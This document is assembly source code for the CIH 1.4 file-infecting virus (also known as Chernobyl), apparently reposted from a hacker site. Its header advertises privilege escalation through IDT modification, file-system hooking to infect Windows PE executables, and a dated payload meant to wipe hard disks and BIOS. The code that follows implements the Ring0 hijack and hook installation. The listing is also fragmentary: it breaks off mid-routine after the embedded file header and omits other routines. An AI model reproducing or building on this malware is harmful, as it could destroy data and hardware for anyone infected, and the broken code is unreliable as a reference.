CIH 1.4 Source Code
Source: 黑客防线
; ****************************************************************************
; *                      The Virus Program Information                       *
; ****************************************************************************
; *                                                                          *
; * Designer : CIH                      Source : TTIT of TATUNG in Taiwan    *
; * Create Date : 04/26/1998            Now Version : 1.4                    *
; * Modification Time : 05/31/1998                                           *
; *                                                                          *
; * Turbo Assembler Version 4.0 : tasm /m cih                                *
; * Turbo Link Version 3.01     : tlink /3 /t cih, cih.exe                   *
; *                                                                          *
; *==========================================================================*
; *                          Modification History                            *
; *==========================================================================*
; * v1.0        1. Create the Virus Program.                                 *
; *             2. The Virus Modifies IDT to Get Ring0 Privilege.            *
; * 04/26/1998  3. Virus Code doesn't Reload into System.                    *
; *             4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; *             5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook.  *
; *             6. When System Opens Existing PE File, the File will be      *
; *                Infected, and the File doesn't be Reinfected.             *
; *             7. It is also Infected, even the File is Read-Only.          *
; *             8. When the File is Infected, the Modification Date and Time *
; *                of the File also don't be Changed.                        *
; *             9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call  *
; *                Previous FileSystemApiHook, it will Call the Function     *
; *                that the IFS Manager Would Normally Call to Implement     *
; *                this Particular I/O Request.                              *
; *            10. The Virus Size is only 656 Bytes.                         *
; *==========================================================================*
; * v1.1        1. Especially, the File that be Infected will not Increase   *
; *                it's Size... ^__^                                         *
; * 05/15/1998  2. Hook and Modify Structured Exception Handing.             *
; *                When Exception Error Occurs, Our OS System should be in   *
; *                Windows NT. So My Cute Virus will not Continue to Run,    *
; *                it will Jmup to Original Application to Run.              *
; *             3. Use Better Algorithm, Reduce Virus Code Size.             *
; *             4. The Virus "Basic" Size is only 796 Bytes.                 *
; *==========================================================================*
; * v1.2        1. Kill All HardDisk, and BIOS... Super... Killer...         *
; *             2. Modify the Bug of v1.1                                    *
; * 05/21/1998  3. The Virus "Basic" Size is 1003 Bytes.                     *
; *==========================================================================*
; * v1.3        1. Modify the Bug that WinZip Self-Extractor Occurs Error.   *
; *                So When Open WinZip Self-Extractor ==> Don't Infect it.   *
; * 05/24/1998  2. The Virus "Basic" Size is 1010 Bytes.                     *
; *==========================================================================*
; * v1.4        1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; *             2. Change the Date of Killing Computers.                     *
; * 05/31/1998  3. Modify Virus Version Copyright.                           *
; *             4. The Virus "Basic" Size is 1019 Bytes.                     *
; ****************************************************************************

.586P

; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section)                   *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
        lea     ecx, StopToRunVirusCode-@0[ebx]
        push    ecx
        push    eax

; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************
        push    eax                             ;
        sidt    [esp-02h]                       ; Get IDT Base Address
        pop     ebx                             ;
        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0
        cli
        mov     ebp, [ebx]                      ; Get Exception Base
        mov     bp, [ebx-04h]                   ; Entry Point
        lea     esi, MyExceptionHook-@1[ecx]
        push    esi
        mov     [ebx-04h], si                   ;
        shr     esi, 16                         ; Modify Exception
        mov     [ebx+02h], si                   ; Entry Point Address
        pop     esi

; *************************************
; * Generate Exception to Get Ring0   *
; *************************************
        int     HookExceptionNumber             ; GenerateException
ReturnAddressOfEndException     =       $

; *************************************
; * Merge All Virus Code Section      *
; *************************************

; *************************************
; * Generate Exception Again          *
; *************************************
        int     HookExceptionNumber             ; GenerateException Again

; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************
ReadyRestoreSE:
        sti
        xor     ebx, ebx
        jmp     RestoreSE

; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************
StopToRunVirusCode:
@1      =       StopToRunVirusCode
        xor     ebx, ebx
        mov     eax, fs:[ebx]
        mov     esp, [eax]
RestoreSE:
        pop     dword ptr fs:[ebx]
        pop     eax

; *************************************
; * Return Original App to Execute    *
; *************************************
        pop     ebp
        push    00401000h                       ; Push Original
OriginalAddressOfEntryPoint     =       $-4     ; App Entry Point to Stack
        ret                                     ; Return to Original App Entry Point

; *********************************************************
; *           Ring0 Virus Game Initial Program            *
; *********************************************************
MyExceptionHook:
@2      =       MyExceptionHook
        jz      InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !?    *
; *************************************
        mov     ecx, dr0
        jecxz   AllocateSystemMemoryPage
        add     dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException

; *************************************
; * Return to Ring3 Initial Program   *
; *************************************
ExitRing0Init:
        mov     [ebx-04h], bp                   ;
        shr     ebp, 16                         ; Restore Exception
        mov     [ebx+02h], bp                   ;
        iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
        mov     dr0, ebx                        ; Set the Mark of My Virus Exist in System
        push    00000000fh                      ;
        push    ecx                             ;
        push    0ffffffffh                      ;
        push    ecx                             ;
        push    ecx                             ;
        push    ecx                             ;
        push    000000001h                      ;
        push    000000002h                      ;
        int     20h                             ; VMMCALL _PageAllocate
_PageAllocate   =       $                       ;
        dd      00010053h                       ; Use EAX, ECX, EDX, and flags
        add     esp, 08h*04h
        xchg    edi, eax                        ; EDI = SystemMemory Start Address
        lea     eax, MyVirusStart-@2[esi]
        iretd                                   ; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook   *
; *************************************
InstallMyFileSystemApiHook:
        lea     eax, FileSystemApiHook-@6[edi]
        push    eax                             ;
        int     20h                             ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook =       $       ;
        dd      00400067h                       ; Use EAX, ECX, EDX, and flags
        mov     dr0, eax                        ; Save OldFileSystemApiHook Address
        pop     eax                             ; EAX = FileSystemApiHook Address
        ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
        mov     ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
        mov     edx, [ecx]
        mov     OldInstallFileSystemApiHook-@3[eax], edx
        ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
        lea     eax, InstallFileSystemApiHook-@3[eax]
        mov     [ecx], eax
        cli
        jmp     ExitRing0Init

; *********************************************************
; *         Code Size of Merge Virus Code Section         *
; *********************************************************
CodeSizeOfMergeVirusCodeSection =       offset $

; *********************************************************
; *            IFSMgr_InstallFileSystemApiHook            *
; *********************************************************
InstallFileSystemApiHook:
        push    ebx
        call    @4                              ;
@4:                                             ;
        pop     ebx                             ; mov ebx, offset FileSystemApiHook
        add     ebx, FileSystemApiHook-@4       ;
        push    ebx
        int     20h                             ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook  =       $
        dd      00400068h                       ; Use EAX, ECX, EDX, and flags
        pop     eax
        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link Client FileSystemApiHook
        push    dword ptr [esp+8]
        call    OldInstallFileSystemApiHook-@3[ebx]
        pop     ecx
        push    eax
        ; Call Original IFSMgr_InstallFileSystemApiHook
        ; to Link My FileSystemApiHook
        push    ebx
        call    OldInstallFileSystemApiHook-@3[ebx]
        pop     ecx
        mov     dr0, eax                        ; Adjust OldFileSystemApiHook Address
        pop     eax
        pop     ebx
        ret

; *********************************************************
; *                      Static Data                      *
; *********************************************************
OldInstallFileSystemApiHook     dd      ?